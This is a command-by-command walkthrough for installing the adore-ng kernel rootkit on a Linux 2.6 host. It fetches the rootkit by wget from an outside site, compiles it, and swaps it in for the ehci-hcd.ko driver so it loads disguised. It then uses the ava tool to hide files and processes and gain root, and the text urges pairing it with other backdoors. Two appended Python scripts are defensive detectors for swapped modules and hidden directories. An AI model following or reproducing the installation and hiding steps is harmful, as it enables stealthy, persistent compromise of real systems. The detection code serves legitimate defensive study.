#wget http://www.sectop.com/soft/adore-ng-0.56.zip Download
#unzip adore-ng-0.56.zip Extract
#cd adore-ng-0.56
#cp Makefile.2.6 Makefile Use the Makefile for 2.6 kernels
#make Compile
Error: there is no /usr/src/linux directory
#vi Makefile Looking inside shows it needs the kernel source tree
After mounting the install media, install the kernel-devel package, or just run yum -y install kernel-devel
#rpm -ivh kernel-devel-2.6.18-128.el5.i686.rpm
#ln -s /usr/src/kernels/2.6.18-128.el5-i686/ /usr/src/linux Create a symlink
#make Rebuild adore
Replace an unused kernel module with our rootkit module
#lsmod Look for entries whose Used by is 0
Module Size Used by
nls_utf8 6209 1
autofs4 24261 2
hidp 23105 2
rfcomm 42457 0
l2cap 29505 10 hidp,rfcomm
bluetooth 53797 5 hidp,rfcomm,l2cap
sunrpc 144765 1
ipt_REJECT 9537 0
ip6t_REJECT 9409 1
xt_tcpudp 7105 6
ip6table_filter 6849 1
ip6_tables 18053 1 ip6table_filter
x_tables 17349 4 ipt_REJECT,ip6t_REJECT,xt_tcpudp,ip6_tables
dm_mirror 23109 0
dm_multipath 24013 0
scsi_dh 11713 1 dm_multipath
video 21193 0
hwmon 7365 0
backlight 10049 1 video
sbs 18533 0
i2c_ec 9025 1 sbs
button 10705 0
battery 13637 0
asus_acpi 19289 0
ac 9157 0
ipv6 261473 17 ip6t_REJECT
xfrm_nalgo 13381 1 ipv6
crypto_api 12609 1 xfrm_nalgo
lp 15849 0
snd_ens1371 28513 0
gameport 18633 1 snd_ens1371
snd_rawmidi 26561 1 snd_ens1371
snd_ac97_codec 93025 1 snd_ens1371
ac97_bus 6337 1 snd_ac97_codec
snd_seq_dummy 7877 0
snd_seq_oss 32577 0
pcspkr 7105 0
snd_seq_midi_event 11073 1 snd_seq_oss
snd_seq 49585 5 snd_seq_dummy,snd_seq_oss,snd_seq_midi_event
floppy 57125 0
sg 36189 0
snd_seq_device 11725 4 snd_rawmidi,snd_seq_dummy,snd_seq_oss,snd_seq
snd_pcm_oss 42817 0
snd_mixer_oss 19009 1 snd_pcm_oss
snd_pcm 72133 3 snd_ens1371,snd_ac97_codec,snd_pcm_oss
snd_timer 24517 2 snd_seq,snd_pcm
snd 55237 10 snd_ens1371,snd_rawmidi,snd_ac97_codec,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer
soundcore 11553 1 snd
pcnet32 35269 0
mii 9409 1 pcnet32
i2c_piix4 12237 0
snd_page_alloc 14281 1 snd_pcm
i2c_core 23745 2 i2c_ec,i2c_piix4
ide_cd 40161 1
serio_raw 10693 0
cdrom 36577 1 ide_cd
parport_pc 29157 1
parport 37513 2 lp,parport_pc
dm_raid45 66509 0
dm_message 6977 1 dm_raid45
dm_region_hash 15681 1 dm_raid45
dm_log 14529 3 dm_mirror,dm_raid45,dm_region_hash
dm_mod 62201 4 dm_mirror,dm_multipath,dm_raid45,dm_log
dm_mem_cache 9537 1 dm_raid45
ata_piix 23621 0
libata 156677 1 ata_piix
mptspi 23625 3
mptscsih 36929 1 mptspi
mptbase 76901 2 mptspi,mptscsih
scsi_transport_spi 26305 1 mptspi
sd_mod 25153 4
scsi_mod 141589 7 scsi_dh,sg,libata,mptspi,mptscsih,scsi_transport_spi,sd_mod
ext3 124233 2
jbd 56937 1 ext3
uhci_hcd 25421 0
ohci_hcd 24681 0
ehci_hcd 33357 0
We pick ehci_hcd
#modprobe -l | grep ehci
/lib/modules/2.6.18-128.el5/kernel/drivers/usb/host/ehci-hcd.ko
#modprobe -r ehci-hcd Unload it first
#cp adore-ng-2.6.ko /lib/modules/2.6.18-128.el5/kernel/drivers/usb/host/ehci-hcd.ko Replace it
#modprobe ehci-hcd Reload it
#./ava I Print the info
Checking for adore 0.12 or higher …
Adore 1.56 installed. Good luck.
ELITE_UID: 2618748389, ELITE_GID=4063569279, ADORE_KEY=fgjgggfd CURRENT_ADORE=56
Installed successfully
Usage
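The swap above works because the replaced module's file still has its old name and path, so nothing in the loading sequence complains. The check a defender wants is the reverse of the walkthrough: compare every loaded module's .ko on disk against a known-good hash, and look at zero-refcount modules first since those are the ones that can be unloaded and swapped silently. The script below is an added example for this page, not code from adore-ng or the original post. It assumes a baseline manifest (path to sha256) recorded while the host was known-good; the lsmod lines, module files and baseline in demo() are constructed so it runs offline.

```python
"""Integrity check for loaded kernel modules against a known-good baseline.

Added example for this page, not code from adore-ng or the original post.
Assumptions: a baseline manifest {ko_path: sha256} was recorded while the
host was known-good; lsmod output is available as text. The lsmod lines,
module files and baseline below are constructed for the demo.
"""
import hashlib
import os
import tempfile

# Constructed lsmod excerpt (same column layout as the real command).
SAMPLE_LSMOD = """Module Size Used by
ehci_hcd 33357 0
uhci_hcd 25421 0
ext3 124233 2
"""


def parse_lsmod(text):
    """Return {module_name: used_by_count}, skipping the header line."""
    loaded = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] == "Module":
            continue
        loaded[parts[0]] = int(parts[2])
    return loaded


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def index_ko_files(modules_dir):
    """Map module name -> .ko path. lsmod prints '_' where the file name
    uses '-' (ehci_hcd vs ehci-hcd.ko), so names are normalised."""
    found = {}
    for root, _, files in os.walk(modules_dir):
        for fn in files:
            if fn.endswith(".ko"):
                found[fn[:-3].replace("-", "_")] = os.path.join(root, fn)
    return found


def verify_loaded_modules(lsmod_text, modules_dir, baseline):
    """Return [(module, used_by, reason)] for every loaded module whose
    .ko is missing, not in the baseline, or has a different hash.
    Zero-refcount modules sort first: they can be unloaded and swapped
    without any dependent module noticing."""
    on_disk = index_ko_files(modules_dir)
    findings = []
    for name, used_by in parse_lsmod(lsmod_text).items():
        path = on_disk.get(name)
        if path is None:
            findings.append((name, used_by, "missing"))
        elif path not in baseline:
            findings.append((name, used_by, "unknown"))
        elif sha256_file(path) != baseline[path]:
            findings.append((name, used_by, "modified"))
    findings.sort(key=lambda f: f[1])
    return findings


def demo():
    """Build a throwaway module tree, record a baseline, then overwrite one
    .ko the way the walkthrough does and show that it gets flagged."""
    with tempfile.TemporaryDirectory() as tmp:
        host = os.path.join(tmp, "kernel", "drivers", "usb", "host")
        os.makedirs(host)
        for fn in ("ehci-hcd.ko", "uhci-hcd.ko"):
            with open(os.path.join(host, fn), "wb") as f:
                f.write(b"original " + fn.encode())  # constructed stand-in content
        baseline = {p: sha256_file(p) for p in index_ko_files(tmp).values()}
        # Simulate the swap: a different file now sits at ehci-hcd.ko
        with open(os.path.join(host, "ehci-hcd.ko"), "wb") as f:
            f.write(b"something else entirely")
        return verify_loaded_modules(SAMPLE_LSMOD, tmp, baseline)


if __name__ == "__main__":
    for name, used_by, reason in demo():
        print(f"{name:<12} used_by={used_by} {reason}")
```

On a real host, feed it the output of lsmod and /lib/modules/$(uname -r) with a baseline taken before the machine went into service. Because the kernel module can lie about file contents once loaded, the hashes are only trustworthy when computed from rescue media or another boot; on RPM-based systems rpm -V kernel (or rpm -Vf on a single .ko) performs the same comparison against the package database.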
#./ava
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]
I print info (secret UID etc)
h hide file
u unhide file
r execute as root
R remove PID forever
U uninstall adore
i make PID invisible
v make PID visible
Hiding files
We can hide the directory itself
#cd ../ && mv adore-ng-0.56 /tmp/.adore
#/tmp/.adore/ava h /tmp/.adore
#ls -al /tmp List it to check
Ordinary user to root
This rootkit's hiding works quite well; combined with other backdoors it would be even better.
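Hiding an entry from the listing does not change the parent directory's inode: on ext2/3/4 a directory's link count is 2 plus its number of subdirectories, so a subdirectory that has been filtered out of readdir still counts. The script below is an added example for this page, not code from adore-ng or the original post; it assumes that link-count convention (btrfs reports 1 for directories and is skipped). The listdir parameter is injectable only so the demo can stand in for a hooked readdir without a rootkit present.

```python
"""Spot subdirectories hidden from directory listings by comparing a
directory's link count with the subdirectories that actually show up.

Added example for this page, not code from adore-ng or the original post.
Assumption: the filesystem follows the ext2/3/4 convention that a
directory's st_nlink equals 2 plus its number of subdirectories (btrfs
does not; it reports 1, and such directories are skipped).
"""
import os
import stat
import tempfile


def hidden_subdir_count(path, listdir=os.listdir):
    """Return (link count - 2 - visible subdirectories): how many
    subdirectories the inode says exist but the listing does not show.
    Returns None where the convention is not maintained. `listdir` is
    injectable so the check can be exercised against a filtered listing."""
    st = os.lstat(path)
    if st.st_nlink < 2:
        return None
    visible = 0
    for name in listdir(path):
        try:
            if stat.S_ISDIR(os.lstat(os.path.join(path, name)).st_mode):
                visible += 1
        except FileNotFoundError:
            continue  # raced with a deletion; not a hidden entry
    return st.st_nlink - 2 - visible


def demo():
    """Create a directory with three subdirectories, then feed the check a
    listing that omits '.adore' the way a hooked readdir would (constructed
    stand-in for the rootkit's filtering)."""
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("a", "b", ".adore"):
            os.mkdir(os.path.join(tmp, name))
        honest = hidden_subdir_count(tmp)
        filtered = hidden_subdir_count(
            tmp, lambda p: [n for n in os.listdir(p) if n != ".adore"])
        return honest, filtered


if __name__ == "__main__":
    honest, filtered = demo()
    print("honest listing:", honest, " filtered listing:", filtered)
```

In practice run hidden_subdir_count with the default os.listdir over /tmp, /dev, /var/tmp and similar writable locations; any positive result means the kernel reports more subdirectories than it will list. Regular files hidden the same way do not affect the link count, so this check complements, rather than replaces, comparing a listing taken from rescue media with one taken on the live host.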